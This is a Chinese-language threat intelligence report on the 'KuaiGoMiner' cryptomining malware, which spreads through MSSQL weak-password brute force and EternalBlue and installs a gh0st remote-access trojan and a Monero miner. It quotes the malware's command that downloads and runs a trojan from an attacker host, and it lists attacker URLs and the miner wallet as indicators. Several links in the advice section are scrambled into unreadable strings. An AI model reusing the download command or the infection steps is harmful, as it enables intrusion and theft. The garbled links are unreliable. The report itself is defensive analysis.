-
-
[原创]“快Go矿工”新增MS SQL爆破攻击,上万台电脑中招
-
发表于: 2020-2-20 16:17
-
一、背景
腾讯安全威胁情报中心检测到“快Go矿工”更新,该团伙本次更新利用MSSQL弱口令爆破攻击的方式进行传播。“快Go矿工”由御见威胁情报中心于2019年10月发现,最初仅利用“永恒之蓝”漏洞进行攻击传播,因其使用的C2域名中包含“kuai-go”,腾讯安全威胁情报中心将其命名为“快Go矿工”(KuaiGoMiner)。
“快Go矿工”最新变种将挖矿程序伪装成系统进程WinInit.exe,截止目前已挖矿获得门罗币47个,市值人民币2万余元。同时,病毒在攻陷机器上植入的gh0st远控木马,具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能,被攻陷的电脑还会面临机密信息泄露的风险。
据腾讯安全威胁情报中心统计数据,“快Go矿工”(KuaiGoMiner)变种已攻击上万台电脑。
腾讯安全提醒企业用户检查SQL服务器的SA用户口令,切勿配置弱口令登录,快Go矿工入侵后还会使用永恒之蓝系列攻击工具横向传播,植入远控木马,对政企机构信息系统安全构成严重威胁。
二、漏洞攻击
“快Go矿工” (KuaiGoMiner) 变种在攻陷的系统下载攻击模块,释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具,释放到C:\Windows\Fonts\usa\目录下。
释放成功后go.vbs首先启动,然后执行go.bat,在go.bat中利用服务管理工具NSSM(释放文件名为svchost.exe)将攻击脚本cmd.bat安装为服务HTTPServers反复执行。
cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和
http[:]//sex.zhzy999.net/ip2.php获取本机的IP地址,
请求http[:]//scan.jiancai008.com:88/2020/random.asp获取随机生成的C段和D段为“0.0“的IP地址,然后利用 “永恒之蓝”漏洞攻击工具针对本机同网段IP和随机生成的IP进行扫描攻击。
三、MSSQL爆破
近期KuaiGoMiner还利用MSSQL弱口令爆破进行攻击,爆破成功后首先通过shell代码写入vget.vbs作为下载者程序,然后利用vget.vbs下载PE木马sql.exe,下载命令如下:
C:/Program Files (x86)/Microsoft SQL Server/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exe C:/ProgramData/vget.vbs http[:]//sex.zhzy999.net/sql.exe C:/ProgramData/taskger.exe
sql.exe为gh0st远控木马,该木马控制电脑后,继续下载挖矿木马http[:]//go.jiancai008.com:88/2020/1.rar,然后解压释放文件到目录C:\Windows\Fonts\usa\。
将门罗币挖矿程序WinInit.exe安装为服务”WinIniter”,使用矿池:xmr-eu1.nanopool.org:14433,钱包:4Ao7AGamzR4cs4E4uK5tcFF9TR6ouXMY4LAi64jHGYQZRWYCupQ7coBGzE7BtcHBWvQFreNEMg1s9iws7ejgwZtB1gQ55Uq进行挖矿。
目前该钱包已挖矿获取门罗币47.169个,折合人民币28000余元。
四、安全建议
1.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP服务的账号密码,切勿使用弱口令;
2.根据微软公告及时修复以下Windows系统高危漏洞;
MS17-010永恒之蓝漏洞
XP、WindowsServer2003、win8等系统访问:
a5aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4S2N6r3q4D9L8$3N6Q4x3X3g2#2M7r3c8S2N6r3g2Q4x3X3g2E0K9h3y4J5L8%4y4G2k6Y4c8Q4x3X3g2U0L8$3#2Q4x3V1k6e0k6h3q4J5j5$3S2Q4x3X3g2S2M7%4m8^5i4K6y4r3M7g2)9K6c8p5E0n7y4o6l9I4x3U0f1&6z5l9`.`.
Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:6b9K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6@1k6h3y4Z5L8X3g2@1i4K6u0W2L8h3W2U0M7X3!0K6L8$3k6@1i4K6u0W2j5$3!0E0i4K6u0r3P5X3S2Q4x3X3c8U0L8W2)9J5c8X3I4A6j5Y4u0S2M7Y4W2Q4x3V1k6K6k6h3y4#2M7X3W2@1P5g2)9J5c8X3#2K6x3e0N6Q4x3X3b7H3x3e0m8Q4x3X3g2S2M7%4m8^5
建议企业用户使用腾讯T-Sec终端安全管理系统(腾讯御点,下载链接:165K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6i4K6u0W2N6r3g2F1j5$3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8Y4m8J5L8$3c8#2j5%4c8Q4x3V1k6&6k6q4)9J5c8X3W2F1k6r3g2^5i4K6u0W2K9s2c8E0L8q4!0q4c8W2!0n7b7#2)9^5z5g2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7z5q4!0m8b7g2!0q4y4q4!0n7b7g2!0n7b7g2!0q4y4#2)9&6y4q4!0m8z5q4!0q4y4W2)9^5z5q4!0n7y4#2!0q4y4q4!0n7c8q4!0n7c8W2!0q4y4#2)9&6y4q4!0m8z5q4!0q4z5q4)9^5y4g2!0n7c8g2!0q4z5q4!0m8c8g2!0m8c8W2!0q4y4#2)9&6y4q4!0n7y4g2!0q4z5q4)9^5y4q4)9&6x3g2!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4g2!0m8c8g2!0n7y4W2!0q4z5q4!0n7c8W2)9&6b7W2!0q4z5q4!0m8x3g2)9^5b7#2!0q4y4W2!0n7b7#2)9^5c8W2!0q4y4W2!0n7y4q4)9&6c8g2!0q4y4W2)9^5z5g2!0m8b7W2!0q4y4W2)9^5c8W2)9^5c8W2!0q4y4g2)9&6x3W2)9^5b7#2!0q4y4q4!0n7c8W2!0m8c8g2!0q4y4g2!0m8y4q4)9^5c8q4!0q4x3#2)9^5x3q4)9^5x3R3`.`.
3.企业用户可部署腾讯T-Sec高级威胁检测系统(御界),发现、追踪黑客攻击线索。腾讯T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(2f1K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6i4K6u0W2N6r3g2F1j5$3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8Y4m8J5L8$3c8#2j5%4c8Q4x3V1k6Y4K9Y4N6^5K9X3y4Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3S2@1L8h3I4Q4c8f1k6Q4b7V1y4Q4z5o6V1`.
IOCs
IP
64.111.27.3
Domain
sex.zhzy999.net
scan.jiancai008.com
s.jiancai008.com
go.jiancai008.com
URL
http[:]//sex.zhzy999.net/sql.exe
http[:]//go.jiancai008.com:88/2020/1.rar
http[:]//go.jiancai008.com:88/2020/2.rar
http[:]//go.jiancai008.com:88/2020/3.rar
MD5
1a5ba25af9d21f36cf8b3df7d2f55348
b87af17c857b208fcd801cb724046781
09bf2fef86d96ec9a1c3be0a020ae498
57bd72d6dc95ff57b5321a62b9f7cde2
70d3908f1b9909b7d23ee265e77dd1f9
1f1bc2ec00db3551d7700c05c87956df
05c57ccd23ab3f623bf1adda755af226
|
|
|---|---|
|
|
|
